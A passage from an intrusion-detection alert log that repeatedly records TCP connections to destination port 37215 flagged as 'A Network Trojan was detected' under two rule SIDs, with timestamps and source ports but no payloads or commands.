          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102494
          SID:2835222
          Source Port:59752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988254
          SID:2835222
          Source Port:35972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928045
          SID:2835222
          Source Port:60226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399175
          SID:2835222
          Source Port:40380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082061
          SID:2829579
          Source Port:58728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035910
          SID:2829579
          Source Port:49298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606849
          SID:2835222
          Source Port:47862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945438
          SID:2829579
          Source Port:34402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.560594
          SID:2829579
          Source Port:54632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818623
          SID:2829579
          Source Port:50558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168235
          SID:2835222
          Source Port:36844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557970
          SID:2835222
          Source Port:34126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987820
          SID:2835222
          Source Port:57112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558351
          SID:2829579
          Source Port:42038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921028
          SID:2835222
          Source Port:56830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862601
          SID:2829579
          Source Port:58228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820467
          SID:2835222
          Source Port:49842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038044
          SID:2835222
          Source Port:34752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819093
          SID:2835222
          Source Port:56314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870632
          SID:2835222
          Source Port:60260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120939
          SID:2835222
          Source Port:41152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.080805
          SID:2829579
          Source Port:40602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103567
          SID:2835222
          Source Port:41514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.986547
          SID:2829579
          Source Port:50298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.474541
          SID:2829579
          Source Port:51248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034107
          SID:2829579
          Source Port:47232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861901
          SID:2829579
          Source Port:42326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.950206
          SID:2829579
          Source Port:55460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.067385
          SID:2835222
          Source Port:37180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230896
          SID:2835222
          Source Port:34162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720659
          SID:2835222
          Source Port:46768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951478
          SID:2829579
          Source Port:39306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.271797
          SID:2835222
          Source Port:36898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415357
          SID:2835222
          Source Port:56046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034708
          SID:2829579
          Source Port:34410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944201
          SID:2829579
          Source Port:39448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412448
          SID:2835222
          Source Port:57576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283779
          SID:2835222
          Source Port:45764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081031
          SID:2829579
          Source Port:38492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287470
          SID:2835222
          Source Port:43800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035126
          SID:2829579
          Source Port:43158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.241850
          SID:2829579
          Source Port:42770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718194
          SID:2829579
          Source Port:43180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928323
          SID:2829579
          Source Port:59090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920186
          SID:2835222
          Source Port:42102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250602
          SID:2835222
          Source Port:43734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288656
          SID:2829579
          Source Port:38076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471763
          SID:2829579
          Source Port:52502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253134
          SID:2829579
          Source Port:54294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163196
          SID:2835222
          Source Port:39964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.271261
          SID:2829579
          Source Port:53908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399944
          SID:2829579
          Source Port:51840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821980
          SID:2829579
          Source Port:60834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910491
          SID:2835222
          Source Port:33134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162446
          SID:2829579
          Source Port:56630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.917080
          SID:2829579
          Source Port:38166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031702
          SID:2835222
          Source Port:36330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867142
          SID:2835222
          Source Port:52268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862027
          SID:2829579
          Source Port:54242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.420129
          SID:2835222
          Source Port:45062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721047
          SID:2829579
          Source Port:49634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.273344
          SID:2835222
          Source Port:40464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720104
          SID:2829579
          Source Port:53718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.275842
          SID:2835222
          Source Port:45094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.290189
          SID:2835222
          Source Port:36558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034085
          SID:2835222
          Source Port:59372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396628
          SID:2829579
          Source Port:48518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719410
          SID:2829579
          Source Port:55002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922087
          SID:2835222
          Source Port:43512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078932
          SID:2829579
          Source Port:34254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724182
          SID:2829579
          Source Port:60162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477560
          SID:2835222
          Source Port:48610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205835
          SID:2829579
          Source Port:48480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568274
          SID:2829579
          Source Port:40304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473395
          SID:2829579
          Source Port:46098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468026
          SID:2829579
          Source Port:53490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033065
          SID:2835222
          Source Port:46810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538760
          SID:2829579
          Source Port:38734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929562
          SID:2829579
          Source Port:47568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.653549
          SID:2835222
          Source Port:60112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103920
          SID:2829579
          Source Port:41678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.948870
          SID:2829579
          Source Port:50226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821842
          SID:2829579
          Source Port:33684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.289053
          SID:2835222
          Source Port:55678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929785
          SID:2829579
          Source Port:44512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.039163
          SID:2835222
          Source Port:47108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080213
          SID:2835222
          Source Port:45264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226846
          SID:2829579
          Source Port:37944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104056
          SID:2829579
          Source Port:52330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033368
          SID:2829579
          Source Port:54054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029477
          SID:2835222
          Source Port:55660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034745
          SID:2835222
          Source Port:44794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860308
          SID:2835222
          Source Port:58576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164533
          SID:2835222
          Source Port:39234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.278892
          SID:2829579
          Source Port:36766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.866154
          SID:2835222
          Source Port:40004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645188
          SID:2835222
          Source Port:48886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418678
          SID:2829579
          Source Port:36318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.277085
          SID:2829579
          Source Port:47462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919253
          SID:2829579
          Source Port:45416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227107
          SID:2835222
          Source Port:48986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603415
          SID:2835222
          Source Port:49042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945454
          SID:2835222
          Source Port:37362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865861
          SID:2829579
          Source Port:40388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162841
          SID:2835222
          Source Port:53714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.039177
          SID:2835222
          Source Port:55728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166171
          SID:2829579
          Source Port:35284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821536
          SID:2829579
          Source Port:46240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082257
          SID:2829579
          Source Port:36136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948963
          SID:2829579
          Source Port:48448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990593
          SID:2835222
          Source Port:32860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415577
          SID:2835222
          Source Port:49086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465167
          SID:2835222
          Source Port:45446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538145
          SID:2835222
          Source Port:56178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166862
          SID:2829579
          Source Port:58592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478902
          SID:2829579
          Source Port:60996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102898
          SID:2835222
          Source Port:50964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643436
          SID:2829579
          Source Port:37264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230232
          SID:2829579
          Source Port:46372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558226
          SID:2835222
          Source Port:50480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558775
          SID:2835222
          Source Port:52018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915032
          SID:2835222
          Source Port:52666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.942095
          SID:2835222
          Source Port:35404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998808
          SID:2835222
          Source Port:33892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921944
          SID:2835222
          Source Port:40032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.902429
          SID:2835222
          Source Port:53426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.278823
          SID:2835222
          Source Port:59122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291269
          SID:2829579
          Source Port:41660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223443
          SID:2829579
          Source Port:52248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539076
          SID:2829579
          Source Port:54878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418835
          SID:2829579
          Source Port:55462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034255
          SID:2829579
          Source Port:60952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.859457
          SID:2829579
          Source Port:43882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078627
          SID:2829579
          Source Port:52196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599431
          SID:2835222
          Source Port:47314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414732
          SID:2829579
          Source Port:33784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243707
          SID:2835222
          Source Port:51742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716341
          SID:2835222
          Source Port:34380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.639952
          SID:2835222
          Source Port:58038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986356
          SID:2835222
          Source Port:45540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931395
          SID:2835222
          Source Port:54674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600476
          SID:2835222
          Source Port:41674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822049
          SID:2835222
          Source Port:53822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.642767
          SID:2829579
          Source Port:43014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.284968
          SID:2829579
          Source Port:56898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861111
          SID:2829579
          Source Port:55418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.099677
          SID:2835222
          Source Port:48292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290029
          SID:2829579
          Source Port:34952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415879
          SID:2835222
          Source Port:33852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035506
          SID:2835222
          Source Port:52266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164643
          SID:2829579
          Source Port:52028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274294
          SID:2835222
          Source Port:50466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158387
          SID:2829579
          Source Port:35044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863232
          SID:2829579
          Source Port:51094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.087215
          SID:2829579
          Source Port:39186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.100895
          SID:2835222
          Source Port:52272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030589
          SID:2835222
          Source Port:51834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472049
          SID:2829579
          Source Port:52122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.129320
          SID:2835222
          Source Port:37488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.637997
          SID:2835222
          Source Port:60486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643775
          SID:2829579
          Source Port:41168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989580
          SID:2829579
          Source Port:35618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168942
          SID:2835222
          Source Port:55268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414599
          SID:2835222
          Source Port:43398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860582
          SID:2829579
          Source Port:42704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947088
          SID:2835222
          Source Port:36712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.653004
          SID:2829579
          Source Port:52806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165999
          SID:2835222
          Source Port:36624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598010
          SID:2835222
          Source Port:60336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.093303
          SID:2835222
          Source Port:43884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168013
          SID:2835222
          Source Port:47104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299469
          SID:2835222
          Source Port:47054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538525
          SID:2835222
          Source Port:53562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.083132
          SID:2835222
          Source Port:55680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244000
          SID:2829579
          Source Port:59838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036257
          SID:2829579
          Source Port:52114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274517
          SID:2829579
          Source Port:59612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910669
          SID:2835222
          Source Port:58304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287724
          SID:2835222
          Source Port:33006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.660789
          SID:2829579
          Source Port:36406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166419
          SID:2829579
          Source Port:53288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920513
          SID:2835222
          Source Port:58892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987139
          SID:2829579
          Source Port:32804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033262
          SID:2835222
          Source Port:42260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226857
          SID:2829579
          Source Port:35630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033141
          SID:2829579
          Source Port:41448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.994784
          SID:2829579
          Source Port:53644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867056
          SID:2835222
          Source Port:60896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038298
          SID:2829579
          Source Port:50122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538058
          SID:2829579
          Source Port:36572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167413
          SID:2835222
          Source Port:43960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286416
          SID:2829579
          Source Port:48116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604559
          SID:2829579
          Source Port:38170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559102
          SID:2835222
          Source Port:53436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602626
          SID:2829579
          Source Port:55588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.121451
          SID:2829579
          Source Port:48100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.314007
          SID:2829579
          Source Port:59946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
